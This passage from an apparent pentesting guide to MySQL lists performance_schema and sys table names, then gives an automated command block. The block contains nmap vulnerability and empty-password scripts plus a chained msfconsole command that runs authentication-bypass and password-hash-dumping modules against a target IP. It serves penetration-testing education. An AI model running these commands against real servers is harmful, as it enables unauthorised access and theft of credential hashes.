events\_stages\_summary\_by\_thread\_by\_event\_name\
events\_stages\_summary\_by\_user\_by\_event\_name\
events\_stages\_summary\_global\_by\_event\_name\
events\_statements\_current\
events\_statements\_history\
events\_statements\_history\_long\
events\_statements\_summary\_by\_account\_by\_event\_name\
events\_statements\_summary\_by\_digest\
events\_statements\_summary\_by\_host\_by\_event\_name\
events\_statements\_summary\_by\_program\
events\_statements\_summary\_by\_thread\_by\_event\_name\
events\_statements\_summary\_by\_user\_by\_event\_name\
events\_statements\_summary\_global\_by\_event\_name\
events\_transactions\_current\
events\_transactions\_history\
events\_transactions\_history\_long\
events\_transactions\_summary\_by\_account\_by\_event\_name\
events\_transactions\_summary\_by\_host\_by\_event\_name\
events\_transactions\_summary\_by\_thread\_by\_event\_name\
events\_transactions\_summary\_by\_user\_by\_event\_name\
events\_transactions\_summary\_global\_by\_event\_name\
events\_waits\_current\
events\_waits\_history\
events\_waits\_history\_long\
events\_waits\_summary\_by\_account\_by\_event\_name\
events\_waits\_summary\_by\_host\_by\_event\_name\
events\_waits\_summary\_by\_instance\
events\_waits\_summary\_by\_thread\_by\_event\_name\
events\_waits\_summary\_by\_user\_by\_event\_name\
events\_waits\_summary\_global\_by\_event\_name\
file\_instances\
file\_summary\_by\_event\_name\
file\_summary\_by\_instance\
global\_status\
global\_variables\
host\_cache\
hosts\
memory\_summary\_by\_account\_by\_event\_name\
memory\_summary\_by\_host\_by\_event\_name\
memory\_summary\_by\_thread\_by\_event\_name\
memory\_summary\_by\_user\_by\_event\_name\
memory\_summary\_global\_by\_event\_name\
metadata\_locks\
mutex\_instances\
objects\_summary\_global\_by\_type\
performance\_timers\
prepared\_statements\_instances\
replication\_applier\_configuration\
replication\_applier\_status\
replication\_applier\_status\_by\_coordinator\
replication\_applier\_status\_by\_worker\
replication\_connection\_configuration\
replication\_connection\_status\
replication\_group\_member\_stats\
replication\_group\_members\
rwlock\_instances\
session\_account\_connect\_attrs\
session\_connect\_attrs\
session\_status\
session\_variables\
setup\_actors\
setup\_consumers\
setup\_instruments\
setup\_objects\
setup\_timers\
socket\_instances\
socket\_summary\_by\_event\_name\
socket\_summary\_by\_instance\
status\_by\_account\
status\_by\_host\
status\_by\_thread\
status\_by\_user\
table\_handles\
table\_io\_waits\_summary\_by\_index\_usage\
table\_io\_waits\_summary\_by\_table\
table\_lock\_waits\_summary\_by\_table\
threads\
user\_variables\_by\_thread\
users\
variables\_by\_thread

**sys**

host\_summary\
host\_summary\_by\_file\_io\
host\_summary\_by\_file\_io\_type\
host\_summary\_by\_stages\
host\_summary\_by\_statement\_latency\
host\_summary\_by\_statement\_type\
innodb\_buffer\_stats\_by\_schema\
innodb\_buffer\_stats\_by\_table\
innodb\_lock\_waits\
io\_by\_thread\_by\_latency\
io\_global\_by\_file\_by\_bytes\
io\_global\_by\_file\_by\_latency\
io\_global\_by\_wait\_by\_bytes\
io\_global\_by\_wait\_by\_latency\
latest\_file\_io\
memory\_by\_host\_by\_current\_bytes\
memory\_by\_thread\_by\_current\_bytes\
schema\_table\_statistics\
schema\_table\_statistics\_with\_buffer\
schema\_tables\_with\_full\_table\_scans\
schema\_unused\_indexes\
session\
session\_ssl\_status\
statement\_analysis\
statements\_with\_errors\_or\_warnings\
statements\_with\_full\_table\_scans\
statements\_with\_runtimes\_in\_95th\_percentile\
statements\_with\_sorting\
statements\_with\_temp\_tables\
sys\_config\
user\_summary\
user\_summary\_by\_file\_io\
user\_summary\_by\_file\_io\_type\
user\_summary\_by\_stages\
user\_summary\_by\_statement\_latency\
user\_summary\_by\_statement\_type\
version\
wait\_classes\_global\_by\_avg\_latency\
wait\_classes\_global\_by\_latency\
waits\_by\_host\_by\_latency\
waits\_by\_user\_by\_latency\
waits\_global\_by\_latency\
x$host\_summary\
x$host\_summary\_by\_file\_io\
x$host\_summary\_by\_file\_io\_type\
x$host\_summary\_by\_stages\
x$host\_summary\_by\_statement\_latency\
x$host\_summary\_by\_statement\_type\
x$innodb\_buffer\_stats\_by\_schema\
x$innodb\_buffer\_stats\_by\_table\
x$innodb\_lock\_waits\
x$io\_by\_thread\_by\_latency\
x$io\_global\_by\_file\_by\_bytes\
x$io\_global\_by\_file\_by\_latency\
x$io\_global\_by\_wait\_by\_bytes\
x$io\_global\_by\_wait\_by\_latency\
x$latest\_file\_io\
x$memory\_by\_host\_by\_current\_bytes\
x$memory\_by\_thread\_by\_current\_bytes\
x$memory\_by\_user\_by\_current\_bytes\
x$memory\_global\_by\_current\_bytes\
x$memory\_global\_total\
x$processlist\
x$ps\_digest\_95th\_percentile\_by\_avg\_us\
x$ps\_digest\_avg\_latency\_distribution\
x$ps\_schema\_table\_statistics\_io\
x$schema\_flattened\_keys\
x$schema\_index\_statistics\
x$schema\_table\_lock\_waits\
x$schema\_table\_statistics\
x$schema\_table\_statistics\_with\_buffer\
x$schema\_tables\_with\_full\_table\_scans\
x$session\
x$statement\_analysis\
x$statements\_with\_errors\_or\_warnings\
x$statements\_with\_full\_table\_scans\
x$statements\_with\_runtimes\_in\_95th\_percentile\
x$statements\_with\_sorting\
x$statements\_with\_temp\_tables\
x$user\_summary\
x$user\_summary\_by\_file\_io\
x$user\_summary\_by\_file\_io\_type\
x$user\_summary\_by\_stages\
x$user\_summary\_by\_statement\_latency\
x$user\_summary\_by\_statement\_type\
x$wait\_classes\_global\_by\_avg\_latency\
x$wait\_classes\_global\_by\_latency\
x$waits\_by\_host\_by\_latency\
x$waits\_by\_user\_by\_latency\
x$waits\_global\_by\_latency

## HackTricks Automatic Commands

```
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
https://book.hacktricks.xyz/pentesting/pentesting-mysql
Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
```